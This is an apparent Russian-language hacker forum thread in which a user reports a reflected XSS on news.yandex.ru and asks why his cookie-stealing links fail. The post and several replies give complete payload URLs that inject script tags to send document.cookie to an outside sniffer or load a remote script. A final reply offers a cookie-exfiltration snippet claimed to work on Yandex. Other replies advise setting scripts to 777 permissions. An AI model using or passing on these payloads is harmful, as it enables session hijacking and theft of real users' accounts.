Привет всем! (ПОИСКОВИКОМ ПОЛЬЗОВАЛСЯ И ПРОЧИТАЛ ВСЕ СТАТЬИ О XSS на сайте)
_____--____
Начнем
_____--____
Нашел я xss на сайте news.yandex.ru (уязвимость точно есть, так как при подставки кода "<script>alert(document.domain)</script>" выкидывает название сайта) Зарегистрировал я себе 2 мыла на яндексе (1@yandex.ru and 2@yandex.ru) и пытаюсь спереть куки от одно. Тренинг короче)))
____--_____
Практика
____--_____
Отсылаю с 1@yandex.ru на 2@yandex.ru письмо с сылкой
http://[адрес сайта]<script src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script>
____--_____
Вопросы
____--_____
1) Почему на снифер не приходят куки?
2) Прочитал на форуме античата что в активных Xss участие жертвы не нужно. Разьясните этот момент ведь мы все равно будем кидать ссылку жертве на мыло??
3) В некоторых статьях советают создать скрипты php
a) нужно прописывать права для скриптов на своем сайте?
Зачем создавать скрипты когда можно через сниффер угнать куки. Или я не прав?
_____--_____
Последние слова (Заключение)
_____--_____
Поиском пользовался, видио смотрел!!!
Спасибо огромное всем кто ответит на вопросы!!

1) сложно сказать, хорошобы еслиб ты привёл пример
2) письмо жертве посылается в html формате , где внедрён тег , который использует javascript - это и есть xss,
пример : <img src="javascript:alert()"> - вот , жертве не нужно ничего нажимать, скрипт сработает в любом случае
3) сессия, которая приходит на снифер "живёт" не долго, поэтому лучше, чтоб этот скрипт выполнял автоматически то, что ты хочешь сделать в почте
права ставь 777 ( rwxrwxrwx ) – не ошибешься ( а лучше почитай про права никсах)

Дополню Майора
уязвимость точно есть, так как при подставки кода "<script>alert(document.domain)</script>" выкидывает название сайта
Выкидывать алерт оно может, однако слеши, плюс, кавычки, проценты, точка с запятой и т.п. может и резаться.
+ когда высылаешь ссылку по почте - также и твой <script> будет вырезаться.

Полный ход действий!
Вот Xss http://news.yandex.ru/yandsearch?cl4url=lenta.ru/news/2006/08/24/nine/&country=Russia"><script>alert(document.domain)</script>
Вот ято я посылаю на почту http://news.yandex.ru/yandsearch?cl4url=www.rian.ru/society/20060824/53095993.html&country=Russia"><script%20src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script>
Вопрос: Почему не приходят куки?
_____--_____
Другой способ по статье http://forum.web-hack.ru/index.php?showtopic=28026&st=0
_____--_____
Таже самая Xss
Скрипты залиты на хостинг права прописаны!
Отсылаю жертве http://news.yandex.ru/yandsearch?cl4url=primamedia.ru/news/show/%3Fid%3D19366&country=Russia="><script%20src=http://[мой_сайт]/script/xss.js>%20</script>
Куков тоже нет? :((((((((
Примечание: Я отсылаю <script src=http://[мой_сайт]/script/xss.js></script> жертве а потом он преобразуется в <script%20src=http://[мой_сайт]/script/xss.js>%20</script>
Это играет какую нибудь роль?
Ответьте пожалуйста на 3 вопроса:
1) Почему нет куков в 1 случае
2) Почему нет куков во 2 случае
3) Это играет какую нибудь роль?
Заранее спасибо спасибо спасибо)))))




_____--_____

Ты лучше сам попробуй разобраться. Я долго с ними возился и доставал в пм майора, и все равно у меня то получалось, то нет. Потом разобрался вот и все и нет проблем

Ты лучше сам попробуй разобраться. Я долго с ними возился и доставал в пм майора, и все равно у меня то получалось, то нет. Потом разобрался вот и все и нет проблем
Напиши в чем может быть проблема?

Во первых, твоя хсс пассивная, а это означает, что ничего не заработает, пока жертва не нажмёт на твою ссылку(а это должен быть полный ламер(ша), чтоб жать на левые линки).

Во вторых твоя пассивная хсс находится на другом поддомене, а куки на разных поддоменах отличаются. Те куки на mail.yandex.ru свои, а на news.yandex.ru свои.
Так что даже если он(а) и нажмёт - толка не будет.

В третьих - нафига тебе домен? <script>alert(document.domain)</script>
Куки уганяются document.cookie, или когда данные передаются через гет-запрос - document.location

В четвёртых человек может проверять почту используя программы типа зебата, аутлука, мозилы и прочих. И тут хоть тресни.

В третьих - нафига тебе домен? <script>alert(document.domain)</script>
Куки уганяются document.cookie, или когда данные передаются через гет-запрос - document.location

Вот именно... Проверь гляют ли кукисы авторизации НА ПОЧТУ под этим доменом...

Бля я вообще запутался ((((((
bul.666
Напиши как проверить!!!
При подставки document.cookie вылазиет большая таблица где дохрена цифр! Что это значит?
При подставки document.location выскакивает url который написан в строке браузера.
Что нам это дает?

Активный xss отличается от пассивного тем, что ты его не видишь. Это просто код внедрённый в страницу, он выполняется при открытии страницы.
В твоём случае, ты используешь пассивный xss. Чел кликнуть туда должен.
Если я найду xss на www.bla.com, и пошлю тебе ссылку на твою почту на мэйл.ру Если ты её кликнешь куков не будет. Потому что mail.ru и bla.com два разных хоста.
Так же 1.mail.ru, 2.mail.ru fuck.mail.ru могут быть разными хостами.

Активный xss отличается от пассивного тем, что ты его не видишь. Это просто код внедрённый в страницу, он выполняется при открытии страницы.
В твоём случае, ты используешь пассивный xss. Чел кликнуть туда должен.
Если я найду xss на www.bla.com, и пошлю тебе ссылку на твою почту на мэйл.ру Если ты её кликнешь куков не будет. Потому что mail.ru и bla.com два разных хоста.
Так же 1.mail.ru, 2.mail.ru fuck.mail.ru могут быть разными хостами.
Это я понял, но всеравно спасибо :)
А на вопросы кто нибудь ответит? :D

http://[адрес сайта]<script src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script>
Попробуй использовать другой код. Не факт что твой код вообще должен работать.
Вот код который работает 100% на ксс в яндексе.
<script>img = new Image(); img.src = "your sniffer"+document.cookie;</script>